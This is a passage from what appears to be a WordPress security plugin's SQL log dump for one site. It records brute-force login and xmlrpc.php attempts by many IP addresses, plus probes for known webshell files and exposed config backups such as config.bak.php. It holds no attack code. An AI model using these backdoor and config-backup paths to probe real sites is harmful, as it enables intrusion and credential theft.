'',0,1665524366.3367,55,'QKpdXqW6Yrc01APxjVJiZGkD','','19|0|0|0|cteisys.com/wp-includes/wp-system-opencloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524365.2476,55,'vBM0qdAJLCgRNXQyEmhIoUnS','','19|0|0|0|cteisys.com/wp-includes/wp-system-cloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524364.1213,55,'qgcj9WmxpklPZhDTLOw31s6r','','19|0|0|0|cteisys.com/wp-includes/wp-shield-icon-managed.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524363.0223,55,'LhcVs1kTOYwNUAHx8qvMuzjg','','19|0|0|0|cteisys.com/wp-includes/system-reboot.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524361.9119,55,'M9o1bkIDK2iqCfa7JVtUpOen','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524360.8034,55,'sopKWUEg4mzQrV91AaJxhT6R','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-cloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524359.6869,55,'V25snmW48cUCTBfALODdY0xb','','19|0|0|0|cteisys.com/wp-includes/class-detect-spam.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524358.5908,55,'hWv3eaFogAHUcJBMOCY2p70Q','','19|0|0|0|cteisys.com/wp-files-conficg.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524357.4865,55,'WXhFiB1pUjvuZlrqTxH0Ks3V','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524356.3836,55,'Lz8C9kbMtlxvrA04FQRDVhf3','','19|0|0|0|cteisys.com/wordpress-index-keyword.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524355.3312,55,'ByOU9RMl1aiQIdjfVZuWXpHc','','19|0|0|0|cteisys.com/system-reboot.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524354.1481,55,'2IjpoMl4kyfGq16vx0KreCOz','','19|0|0|0|cteisys.com/class-wordpress-cloud.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524353.0239,10,'qGSYmXjIh0dQrVicknRFTuCH','','707|0|0|0|cteisys.com/class-detect-spam.php',0,707,0),('178.128.111.192',2994761664,'',0,1665524353.0211,55,'qGSYmXjIh0dQrVicknRFTuCH','','19|0|0|0|cteisys.com/class-detect-spam.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524351.9326,55,'yV1LgFGAhJX3Q9De0487SfNv','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524350.8587,55,'4xO5NbXVFeZPcEAD1TIUlkCJ','','19|0|0|0|cteisys.com/wp-content/plugins/seoplugins/mar.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524349.7395,55,'BuTr4cvLwHRspUdEOh3nG7Yk','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('178.128.111.192',2994761664,'',0,1665524348.6569,55,'GPvy5OZprVBqb18K3jATuWCN','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/index.php',0,19,0),('147.182.249.22',2478242070,'newd',0,1665523970.9741,7,'YfcdSwFEZ5amohQg0xXWDVJU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.49.253',3515691517,'Joyce',0,1665523919.5368,152,'atR4Ucfu37EHG1ogJ9sdzFAC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1665523163.6891,7,'DaeTIB6CyhiA7RskSgKfuL2W','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.249.31.157',2918784925,'',0,1665526750.8071,55,'m5yPsclrTSAv1BkbLg2Ow80x','','19|0|0|0|cteisys.com/wp-content/plugins/wp-dester/dester/wp-dester.php',0,19,0),('213.152.162.149',3583550101,'joyce',0,1665526697.4147,152,'OPdoBMzDtbqgLwiVcC0pQ1RA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.225',3583556577,'Joyce',0,1665526697.3740,152,'femWUdh3OqR2roSax0GFutHT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.183.216.163',783800483,'joyce',0,1665526077.4720,152,'SKEd02W8uk4DlHqzgQLJCB35','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.70.248.169',1363605673,'newd',0,1665525864.4215,7,'DS6jr7b2V94URzKtGLaTki5l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.111.127.191',1081049023,'newd',0,1665535505.3214,7,'qHeBNI3y4cntKk67lpEaXdhz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('2.58.47.203',37367755,'joyce',0,1665532794.6235,152,'5TuBvgwQFmME6fXRLcUHjhJK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665531663.7373,7,'VP1cCeIHv97SoysAwTEKlnOB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.210.219',628675291,'joyce',0,1665531571.7883,152,'3wa0cuGJimpb7n5U8BtHNrhD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.166',1046910118,'joyce',0,1665531571.6921,152,'WuzftFvlRMayIUXODdrx1qVE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.81.59.92',223427420,'newd',0,1665530841.1105,7,'JbQnLyN1eRmMdIhHSlBxA05o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665530143.9828,7,'XKDC0lV3NxnaJYZAUmcOM5fB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.42.231.47',2032854831,'newd',0,1665529714.4142,7,'83Le29SqdRvfQ7zC1yOkAblp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1665534685.4726,7,'lgBvm0QnZxMjHWL2RpwEF75J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665533976.1207,7,'60J9CF2xYL8MDonrGZf3p1TK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'Joyce',0,1665533539.0766,152,'0eqRm7dPGLKFhz5UtMk9Cnas','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.84.97',2319733857,'newd',0,1665533529.9456,7,'9xVtgwMiDe1Sua8E7OPnhNzG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'Joyce',0,1665533487.4137,152,'UfL2MdZTVsb40qe8nkavPzEw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.151.98.168',3650577064,'joyce',0,1665532838.8818,152,'NFuvG2s3apml7kRHDjo0C1Le','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665539384.8434,7,'L2PXxRZCuE8id9klYIzJVvsr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665537843.5023,7,'AQB6xvezs8d5Tpi3ZhuFILrw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.190.142.217',3116273369,'newd',0,1665537393.5875,7,'sXUOJZ6j9hco1YQiEGMACzbF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1665554344.3625,152,'ZL5QIF74AP9VOBHW3yUsN1gl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.110.137.82',2406386002,'newd',0,1665553912.6001,152,'efNGoMZ1745VlwLKuDsvJ0Qm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.59',2487801403,'newd',0,1665553461.6560,152,'ABW7HrnjshwX0uD6QKICG8dF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.246.208',2650142416,'newd',0,1665553397.2115,7,'3XSqUleYixIzB1Lac8HM6Ktm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665553043.4335,152,'wTLRzsC0iSPKJMVWXajkQ1BG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1665547196.6541,7,'OTe6QEHYsZLCWBJcMNvnbyDz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665546352.1959,7,'3FeAkU7ndIGQfr6wz4D02alb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.22',3355043350,'Joyce',0,1665546207.0119,152,'ymO8TQDwjuKE6lt3nFMhkPUb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.160.233.181',346089909,'',0,1665545574.1759,55,'QZSVxPLWhavNu7EmgKe0wjCA','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('20.160.233.181',346089909,'',0,1665545566.0061,55,'OjCZ6btAy0NJHEMU74aFdBY2','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('120.78.15.126',2018381694,'newd',0,1665545198.4905,7,'c2Oa8wAk9HEmqI4YeXxhU7uW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1665552944.5037,7,'TicsoKUEdvbAhfLNm0Yw481p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.201.215.19',1539954451,'newd',0,1665552609.0429,152,'nIoKvY8JkC0l7uyLZDjMPU62','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665552092.8867,152,'MBFVH2of5zdSnrGbha3iuR8x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.187.99',759020387,'Joyce',0,1665551813.5239,51,'Qx6b5npvwT1ViWFdjCzN89Hg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.174.216',2733747928,'newd',0,1665550642.3972,152,'ghlfOIwy4602bjrSsHNn7ktE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.79',3583550031,'joyce',0,1665549555.8127,152,'BNTHIUWqOtxAPnXiJ25o3lw9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.39.212.31',1294455839,'newd',0,1665549541.4269,7,'uQ2ysKOhia3Fp1IJXeVEfAW4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.105.29.21',778640661,'newd',0,1665549074.3032,7,'eA6Mm1liq52IEzD4xySRVNHh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1665549052.0938,152,'WyB0Tqzr4GnwAIN2FU9ZYtxX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.47.94',3515690846,'Joyce',0,1665548265.0488,51,'E7qi3XS2KVmhazFAcdj8ketZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1665547202.6501,152,'LJqnfByrspejzlMWcDK5Vboa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.134',1364735110,'newd',0,1665551454.1715,152,'wNSjl4qkJpPgbU0ZLudKIE19','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.33.178',908468658,'',0,1665551117.1378,55,'Pw1asVxkK7GAHShDyYjLFi2t','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('54.38.33.178',908468658,'',0,1665551115.4874,55,'bNsqUZWk4gK5BPjhGax92HdF','','19|0|0|0|cteisys.com/wp-content/uploads/wp-queryall.php',0,19,0),('54.38.33.178',908468658,'',0,1665551113.2741,55,'f8geC7xikYvN9yor3LTQaXcZ','','19|0|0|0|cteisys.com/wp-content/themes/twentythree/inc/index.php',0,19,0),('54.38.33.178',908468658,'',0,1665551111.0036,10,'5e1QqJi4xsWrnfECRv8MgIUG','','707|0|0|0|cteisys.com/class-detect-spam.php',0,707,0),('54.38.33.178',908468658,'',0,1665551111.0000,55,'5e1QqJi4xsWrnfECRv8MgIUG','','19|0|0|0|cteisys.com/class-detect-spam.php',0,19,0),('54.38.33.178',908468658,'',0,1665551108.8401,55,'Xfs6ak1Ty2QLgSApmZWbMRVh','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('54.38.33.178',908468658,'',0,1665551106.6612,55,'IYF9RGxreNp6Hbh25iqyw8Bm','','19|0|0|0|cteisys.com/wp-content/plugins/seoplugins/mar.php',0,19,0),('54.38.33.178',908468658,'',0,1665551104.5403,55,'lvAp61XRjTxh4nmNqyGDtszY','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('54.38.33.178',908468658,'',0,1665551102.0841,55,'lVIvXzr4ZdsL7DHTqE0cwaeU','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/index.php',0,19,0),('46.101.150.34',778409506,'newd',0,1665551072.5735,7,'VW0CRq1djBmcQZf5KpGt6FLi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1665557908.1238,7,'JXkf0BAH8rRIyp5ohvGmNqa2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1665557700.5208,152,'FQJe46I8DhYpNWOmnjigvo95','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1665557228.5689,7,'mnfV69DQb0shd3pGHPXEKWU1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1665557041.9447,152,'ACglpPbfnkyUSmXHiNDYqaOw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665556784.0368,7,'Sm9NitoWFLBXgT7bfKUERkh4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665556701.9346,152,'HxWD9dOMRA5ZyU2qB3CNiwoF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.6.209',2335901393,'newd',0,1665556323.2434,152,'e51kzKIud3AD4oafpBHWbLPY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.195.135.67',600016707,'newd',0,1665555958.5790,152,'7cEkm0ObTW8VvQqFix6UgaYl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'newd',0,1665555165.2408,152,'bk7GViNcfTHWPMqClXA1noZO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.225.235',3165053419,'newd',0,1665554916.8572,7,'n09phzrqcmRoHKJLaVEx7FTy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1665554743.1884,152,'pDewtuaNc1EbQGkO2md4C0TY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.164.193.195',3164914115,'newd',0,1665561494.1093,152,'q8C7NBbPYQZl9OscK1Lw0yTg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1665561089.9663,152,'JrpIBhb9oa54F2kG1PTCVQYc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.152.148',2917963924,'newd',0,1665560939.5063,7,'37tB6Nf8cvOCeHR4pXsk0gxL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.190.217',2783493849,'newd',0,1665560726.5624,152,'uVLaMB9XFwp1DmxY8T2kfR64','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665560516.7139,7,'3h4CrsKRbfM5B8q19ZokSI6L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.21.138',2160530826,'newd',0,1665560015.6854,152,'YAqQ4WNLaDtdukOpFPVxBgJ5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1665559693.6010,152,'gaRZl57bTto2Be0SzrWAxLXy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.166.98',2650121826,'newd',0,1665559320.7076,152,'eMrGXT9t4yKsQZROBnuCH5ac','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.51.200',1737569224,'newd',0,1665559039.8232,152,'qmpsix8YdzwSNQ2PchT3VFbI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1665558338.9740,152,'MNrPmDKLlSJEiC1gVcke0vxT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.235.48.108',1156264044,'joyce',0,1665558265.7190,152,'iFmxEtMSCUdHWZPDnfQbR6Bc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665558024.8458,152,'GB420Q3vCd6YImpyfX8hZtWV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1665565101.9225,152,'ZsRvt7W2m9LCOfMVBTFK3QNJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.190.217',2783493849,'newd',0,1665564663.4322,152,'92q7ZBgiUSJVl8vRGIeTDosa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.156',1046910108,'Joyce',0,1665564602.6102,152,'y6lOVuUEvcir3mdpxjBfKJRw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665564285.4271,7,'z8po5wTcPbC94NklIBEfQsWm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1665563852.8562,152,'1Ahwzn2ZlUGNt5Hdsq0FE4xR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1665563468.0396,152,'xmvJc7ketbjUHsDdTi1I0qEw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1665563026.9227,152,'qlWh5rmCV4yDS6ocJQAXNTY9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1665562652.4679,152,'C6XGcoFORrJiYKugUaysthBW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1665562438.3374,7,'FD9KGuUO0AZojvzXxlhf6gbR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1665561877.1636,152,'HrjLPwscuaxl3KBRUYTACfqv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1665561610.0046,7,'LYbDq0Nm6WShkMZuzwOU75g4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.43',3091979563,'joyce',0,1665597581.0396,152,'xbRh98BDu1TzO6qaCk5Sv4Z0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.176.107',2917970027,'newd',0,1665597398.2022,7,'6pfnbXo3O7humxlsZ9dY1Eqj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.237.81.29',2012041501,'newd',0,1665596120.6612,7,'lw7UWZQsTtv5nbgkA8hOzxef','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1665594811.7791,7,'HfCSzBun7s82PJmEhaAwYrIt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.163',3583556259,'Joyce',0,1665594654.5036,152,'5USMhuzndWeGcJmrf0Eb138A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665594626.6148,55,'3M51rWKe4iZJ2kGwBTvxUNLm','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594623.4389,55,'p7RU5rohZclysjBJm3tWQMX1','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594622.2320,100,'RbOY4mnW0GkVxEQIvL27lo3T','','13|0|0|0|cteisys.com/test.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594618.8699,55,'5uY78igOzn9k1l4AbCLK6J3T','','19|0|0|0|cteisys.com/config.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594617.4589,55,'zVrWkLGKi0B2HaucIZXRxjwq','','19|0|0|0|cteisys.com/upload.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594615.7951,55,'j2mEUysg71SYfC8GRxc0XADl','','19|0|0|0|cteisys.com/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594609.8446,55,'sCnNKefiFvU8x9QdkMcHjR7o','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594606.0109,55,'sHgZWT05UFb8hjmQES3GBfqR','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594599.3994,55,'VIQvpusGE7NbkAZRlXD5JUda','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594595.5776,55,'rPGntElDyRsz2Sm0fV7pkFTQ','','19|0|0|0|cteisys.com/legion.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594593.2783,100,'Qaiu7BSLeTwUMj8l6W0X1HAp','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594591.5188,55,'9q57ndJ64FIZ3PEc2gDekvQO','','19|0|0|0|cteisys.com/haders.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594590.4620,100,'GnzIcC2StXTH9L1mNYoFav7V','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594589.3384,100,'p4SdbJWf1n8ol7syj5mZxMYX','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594586.6649,55,'InWDa6B3dsOeAqHio4jChKzb','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594585.2912,18,'Rj8HqEy4rdDYzJihxO9MN2A1','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594581.7962,55,'lQ2ZMCLWcykIfNn4g8isrVGb','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594579.1305,55,'J5tXnAawkvWFIjxSYgGr1L0H','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594577.6841,55,'yzdDrBGC7AlEWJiL8VvXR3aZ','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594573.9435,55,'8vCtQjL3Ghm2FaxdPz64SwkA','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594569.1771,55,'LqolO4W5nH3c6vwBJYNk9xEy','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594566.7047,55,'gt7DXOKBkrhdaAbiJ38VGWHL','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594565.5209,55,'cn2aF96OTWjHdZ5PlMvLAVSr','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594564.4630,55,'z45whvYEFcPyp81uTdDr2b0i','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('159.203.120.246',2680912118,'newd',0,1665585617.3958,7,'JZp3BxYtduXbRWrK4j8w92cO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.101',3583549797,'joyce',0,1665585191.3717,152,'yq3iD7sv5VxREArnOP4oWTB0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.203',3091980235,'Joyce',0,1665584380.9176,152,'B1jCGLI93gZkRWQn0pvATDOl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1665582444.0785,7,'Hmj6dC5kDiGUqLP9Y2IwbThA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.207.57.115',1540307315,'joyce',0,1665581929.1052,152,'FAQjtJwPheuv80qlb5VKzBTX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.59.243.31',2453402399,'',0,1665579553.9762,55,'isGZkcloHhr5q2SeEXj7LBAd','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('146.59.243.31',2453402399,'',0,1665579547.9672,55,'HGCpUoN5ifsZRX94rq2wI7ML','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('80.87.194.140',1347928716,'wadminw',0,1665579089.7381,51,'ERAunfS4Fth7qePcBNg50DTU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.200.116.211',3116922067,'Joyce',0,1665578937.7578,152,'IfN9qEhKZ6RczUoMl3WkYi4u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.58.183.78',3510286158,'joyce',0,1665575989.5397,152,'89GqaZBUf1HoKIizCkhYTp7S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.135.205',1266124749,'newd',0,1665575987.4776,7,'QdJCIoZpvMjDx7PNwElkGbyz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1665575563.8744,152,'sQr3VDl4E0ZW8LjakOX5epC6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1665572346.4682,152,'DkB9KMfmPQRraW8jeJo45lZ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665568667.8076,152,'hPnW4HcBF8YUDvMLNSz0kOeV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'newd',0,1665568208.1297,152,'ENmt1MZoWXspn3a6HSKFvcwd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1665568169.1632,7,'L9boOwh3iPVHas1TIpUJB8n5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.90.235.91',1734011739,'newd',0,1665567731.5990,152,'WSLKNtbDxV7pyMJoQ814ufZw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1665567289.2971,152,'MV9u2cSmbF6p7QTEoixkfgHv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1665566382.1277,152,'1aDMuxdbrs3XlBFwfAN2JYES','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1665566267.4330,7,'lLSEAypB2IW5ui4VOkJtQr7D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('79.143.85.14',1334793486,'newd',0,1665566001.0874,152,'B0LiKoSfEwXns1TpFJqGZQb6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.174.52.230',1169044710,'newd',0,1665565549.4630,152,'yvFN5Yzp7oSdimW6RDxg3rVA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665565442.6975,7,'fU2AMx7Za90l5IPV6DcXeEKj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665572078.5767,7,'WHtmqYAD5jGTE9oMUNgyu10l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('206.189.112.203',3468521675,'newd',0,1665571892.2269,152,'Im46kfE5Qj7OrAMG1DVpPSwl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665571444.3363,152,'fIoSMlNqp2QeBA6w3h07J1jg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.69.10',3270067466,'newd',0,1665570948.3514,152,'YitzJUHlSQhL4jdyc2TBvO0V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.211.177',2487800753,'newd',0,1665570486.1748,152,'ZjvAaDYqWSGpbieQhxTI64dw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.81.19',3324924179,'newd',0,1665570171.3586,7,'Sr8EOwGUBzPjHC1ImqfRyZV6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.153.8.103',3113814119,'newd',0,1665570033.9783,152,'1uGofKSdHMvgX9P2aRctQBOI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.186.168',3583556264,'Joyce',0,1665569577.6267,152,'5Ynf4l1Qk3oDAisbSy0rq9eI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.2.220',2673410780,'newd',0,1665569577.5868,152,'thNcjC9vRwlr2zsSZUDXgKx6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665569323.4538,7,'c8HUbOmyz1Nrv6sCeQ0uFpYB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1665569103.3946,152,'2zTZOm1ntR5WrGeQNuJaIsFl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('186.234.80.121',3135918201,'newd',0,1665575084.0738,15